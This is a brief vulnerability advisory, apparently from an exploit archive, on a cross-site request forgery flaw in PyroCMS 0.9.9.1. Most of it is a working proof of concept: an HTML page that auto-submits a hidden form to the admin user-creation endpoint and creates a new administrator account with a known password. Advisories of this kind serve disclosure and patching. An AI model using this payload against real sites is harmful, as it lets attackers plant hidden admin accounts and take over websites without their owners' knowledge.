Search
Software Vulnerability Tested On Date
PyroCMS 0.9.9.1 Cross-site Request Forgery Windows Vista + XAMPP 7/7/2010
Description
A vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.
Proof of Concept
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
            <input type="hidden" name="first_name" value="a" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="email" value="new_admin@x.com" />
            <input type="hidden" name="username" value="new_admin" />
            <input type="hidden" name="display_name" value="a" />
            <input type="hidden" name="group" value="admin" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="confirm_password" value="Password1" />
            <input type="hidden" name="btnAction" value="save" />
        </form>
    </body>
</html>